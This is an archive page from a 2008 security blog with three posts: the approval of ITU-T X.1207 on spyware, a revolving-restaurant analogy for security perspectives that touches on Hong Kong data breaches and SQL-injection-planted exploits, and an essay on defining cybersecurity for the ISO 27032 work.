Bright Stove

Reflecting information risk journey

Archive for May 2008

X.1207 approved

leave a comment »

X.1207 "Guidelines for Telecommunication Service Providers and End-users for Addressing the Risk of Spyware and Potentially Unwanted Software" was determined and undergone a six months review by ITU-T members from Oct 2007 to April 2008 (see my earlier blog entry on this topic). In the April 2008 ITU-T SG 17 meeting in Geneva, the draft Recommendation was approved. It is now a formal ITU-T X.1207 Recommendation. Softcopy (in different formats) of the Recommendation is now available from ITU-T web site at
Besides X.1207, ITU-T SG 17 has also published a number of other cybersecurity related standards following the April 2008 meeting. Please read details at ITU-T Study Group 17 Web log entry.

Written by mengchow

May 26, 2008 at 7:32 am

Posted in Security Standards

Revolving security

leave a comment »

Revolving restaurants are often a hit for children. They are also attractions for adults, but mostly during special occasions. Otherwise, they are often expensive places to dine in. However, the two groups of people are mostly intrigued by different aspects of the technology that is central to the concept leveraged in such restaurants. Adults visiting revolving restaurants like the idea that the restaurant provides a panaromic view of the areas, changing scenery can be enjoyed through the all glass window as the restaurant revolves around the axle of the tall tower. Children, as I observed and experienced as a kid previously, however, are mostly intrigued by the internal changes resulting from the movement. The food serving areas, in particular, is next to the table at one point, and moved away at another point, creating opportunities for another hide-and-seek type of games to chase around. The cost and the contents (i.e., food) are not the main things in such an experience for both groups.
Information security issues are like a revolving restaurant in many regards. People and organizations look at it from different perspectives — whether they are sitting by the window or near the revolving axle where the food and drinks are served, and also depends on their maturity or awareness level, i.e., different views of through the windows as the restaurant revolves. For example, government organizations tend to focus on the confidentiality of information because of their knowledge and concerns over national securiy, but people in general worried about their privacy when they know it can be compromised and stolen, otherwise, they would be more worried about viruses and malware, when they got hurt before. Private enterprises however tend to focus on access controls, since it is easier and less costly to do than contents protection. Enterprises are also worried about malware and viruses, since most of them got hurt by such attacks before as well. The type of technology that are deployed and when they deployed them depend on the area of focus (i.e., where they seat). Nobody however like the cost and efforts involved in implementing information securiy. Excepts for the information securty professionals, most users and organizations care even lesser about the elegance and innovation involved in informtion security technology (i.e., the food and drinks). 
This week, in Hongkong, I was invited to speak in four security gatherings, and also meet with a few senior people to discuss about security policies and strategies issues and solutions. Since the begining of the year, there have been a series of incidents relating to information breaches. Beginning with the HK singer/actor’s personal files been compromised by a computer repair guy, sharing them online, to a bank having a server stolen from a branch resuting in 159,000 customer records being held in an "unknown" status, to government department losing private data, and public hospital staff losing a USB thumb drive in a taxi containing 10,000 patient records. So, naturally, sitting next to such a window with such a view revolving in front of the Hongkongers, the focus is on information protection now.
Topics of virus attacks, malware infections, and even the current wave of web application attacks using SQL injection but targeting at end-users as the ultimate victims, have attracted less interest from these audiences (since they are not sitting next to the food and drinks where I sit.) The latter in fact is an emerging risk issue that are already affecting many web sites in the Asia Pacific and Greater China regions. Many web sites owners don’t even know that their web sites have been compromised, as the attackers are very clever in their tactics. They make use of SQL Injection attacks to get access to the database servers. Instead of corrupting, modifying, or retrieving information from the database server, they injected their exploit codes into the database systems. In this way, when the web application is accessed by the end users, normally the customers of the organization involved, the exploit code get served out by the application in the usual manner, and bingo, the end user systems get the infection and become a victim, if it does not have the necessary protection against the exploit. For those of you who are involved in securing your organization’s web server, or are concerned about this attack and want to make sure that the web sites are secure against the attacks, there are a few useful URLs that would provide guidance on how to do so.
These attacks are not capitalizing on new security loopholes, but something that have revolved back to our view, presented in a slightly different manner, based on known old problems relating to input validation.
Reflecting these developments, they serve to remind us the importance of defense-in-depth, not just simply building layers of defenses, but making sure that we look into the security needs for all layers. Increasingly, the proliferation of information devices have made information or data the window view that we see. But this requires actions at other layers at the same time, including application, operating systems, network, physical, and people. While we enjoy the panaromic view presented at the revolving restaurant, we also try to enjoy the food and drinks to make the cost and efforts worthwhile.
Happy dining!

Written by mengchow

May 23, 2008 at 6:32 am

Posted in Risk Management

What is Cybersecurity

with 4 comments

While a a new standard on "Guidelines for Cybersecurity" (27032) is being developed in ISO/IEC JTC 1/SC 27/WG 4, the question of "what is cybersecurity" continues to be asked and debated by members of SC 27, in particular, those who have been active in WG 4. From the various meetings, and side conversations I had with individuals (experts in WG 4) two weeks ago in Kyoto, it is clear that many have different views and opinions of the notion of Cybersecurity. In one of the previous meetings, there were also discussions on whether it should be two words, or one, i.e., "Cyber security", or "Cybersecurity". It seems that the latter is more commonly used nowadays (than say five years ago), and when people use the single word, they probably hold a different view of Cybersecurity than those that use two words to denote their understanding of Cyber security. Perhaps Cyber security, as two words, also seems more user friendly as it would not be flagged as a spelling error by the spell checker. In the near future, I would think, the single word should be accepted by most modern dictionary.
There are two areas that I wish to discuss relating to Cybersecurity (and Cyber security). One relates to its scope of focus that needs attention and actions, and the other, which relates to my role as Convener of WG 4, is the role of standards in Cybersecurity (or Cyber security). Given the space and time here, I would blog about the latter in a later blog. 
In many ways, Cybersecurity issues (I am using the one-word form since it saves one "space" character) are quite similar to green environment issues. Many years ago, many companies which built chemical plants and factories would only be concerned about the safety measures of their facilities, if they were concerned about safety at all, but would not care too much, in most cases, to dispose the toxic waste generated by their factories in a safe manner, especially if the toxicity is assessed as mild. Those waste therefore ended up polluting the environment, until the government and/or civil activists started to raise the issues and have the regulators impose tough measures against such inconsiderate practices. Cybersecurity, in many ways, are quite similar in nature, but need not wait for activists or government to make the first move. As we all (in WG 4) agree, it is about the security of the Cyberspace. Some experts believe that Cybersecurity is the same as Internet security, network security, or information security, and therefore, there’s no need to study it as a topic, or have standards to help improve it. However, I would defer on this. If we take the enterprise view of Internet, network, or information security, companies’ focus will be on how to secure their own Internet presence/business, own corporate network, and own information, just like the chemical factories owners of the past. Anything outside of their business (even for some governments) will be something for others to care about, not them. After all, they are only answerable to the shareholders but not users of the Cyberspace in general. If we don’t take care of it, we would not be able to reliably and securely make use of it for either our business or even to support our digital lifestyle.
In fact, the notion of Cyberspace itself may also be hard to grasp, as it is simply too "soft" a concept. I say that it is a concept as it does not exist in any physical form, but rather, the emergence of the Internet, plus the people, organizations, and activities on all sort of technology devices and networks that are connected to it. It is perhaps best described as a virtual environment.
Cyberspace security is therefore very much the virtual world’s safe/green environment equivalent of the physical world. This is one of the reasons that Cybersecurity is such a challenging topic, just like issues of green environment. So what are the problems when companies only look after their own network and information security needs, without considering the needs for Cybersecurity? I can think of a few here.
Just take Internet web hosting services for an example. As a web hosting services provider, the company’s focus on security would be on the security of the web sites that they host (if they do think about security), so that their tenants will be satisfied with their security and continue to pay rent every month. If the site gets hacked, they will consider moving to a more secure provider. However, without considering the security issues in Cyberspace beyond network or Internet security, like what happened just few years ago, some of the Spammers, Phishers, and even Botnet Controllers have started renting their Internet presence from web hosting services, with valid domain names registered instead of on hacked servers on the Internet. As long as they pay thei rents, the web hosting service providers would not bother whether their tenants are runnig a Spamming or Phishing web site. After all, their web sites are not being attacked, and their business will be affected if they did not have the rental fees to collect. To the Law Enforcement Agencies, it will however be a challenge to take down the related crime syndicate, and they will also need to apply for court permits to do their work. This is the kind of issues that are at the edge of the company’s Internet space. It is often a cost to the business, and when they spend resources on it, they do not see clear returns, either in goodwill or revenue. The ITU-T/SG17 Q6’s X.1207 Recommendation is one of the standards that tried to highlight this sort of issues in relation to Spyware, and provide guidance for best practices.
Beyond this kind of challenges, are security issues resulting from new phenomenons we are observing and experiencing in the Cyberspace, relating to such developments like Second Life, Facebook, MySpace, Blogging, Instant Messaging, and many more Web 2.0 innovations for the new digital lifestyle and workstyle. Each of these communities, or social networking developments have some kind of unique security issues to be considered, besides providing a new platform for old problems to live again (in a more innovative manner). For example, Instant Messaging has become a new platform for virus and worms distribution, child exploitation,and many old crimes, while at the same time introduces new capability for new forms of social engineering attacks. Second Life type of virtual world environment has also brought new crimes between the physical and Cyberworld, since real money is exchanged somewhere between the two worlds, and real people operates and uses these virtualities.
There are some experts who believe that Cybersecurity relates to critical infrastructure protection as well. This is not necessarily an incorrect view, since the availability and reliability of the Cyberspace in many instances rely on the availability and reliability of certain critical infrastructure services (e.g., telecommunications network infrastructure). From another perspective, to deal with Cybersecurity issues, we require substantial communications and coordination between different private and public entities from different countries and organizations. Again, this is also the kind of challenge in critical infrastructure protection. The things we learn and do in critical infrastructure protection may help in improving Cybersecurity then. However, there’s another issue. Critical infrastructure services, to some governments, are regarded as national security related services, and therefore something not always for the public to decide what to do and how to do. Furthermore, knowledge of critical infrastructure weaknesses, if not used appropriately, could implicate on national security directly. Critical infrastructure services such as water and gas, however, do not contribute to Cybersecurity issues. On the other hand, the lack of Cybersecurity protection may impact these services, if their operations are connected to the Cyberspace. Even if they are not today, many would envisage that they do one day. The overlaps, or influence between critical infrastructure protection and Cybersecurity therefore may be complex.
In summary, the discussion above, if have not got you confused, demonstrates one thing. Each of these areas, be it critical infrastructure protection, information security, Internet security, and network security, have its own objectives and scope of focus. By far, critical infrastructure overlaps with many other things that we try to do, but they focus on the reliability, availability, and coordination are more than anything else. Having information security, network security, and Internet security are just fundamental pieces, which must be accomplished before we can talk about critical infrastructure protection. Cybersecurity similarly has its own scope and objectives, which relates to security things that organizations and individuals should be doing for the common security-good of the Cyberspace environment. Cybersecurity relies also on information security, network security, and Internet security as fundamental pieces of building blocks. Cybersecurity is what we need for critical infrastructure protection as well, besides other aspects involved. At the same time, adequate protection of critical infastructure also contributes to the basic security needs (i.e., security, reliability and availability of critical infrastructure) for achieving the goals of Cybersecurity.

Written by mengchow

May 8, 2008 at 2:35 pm

%d bloggers like this: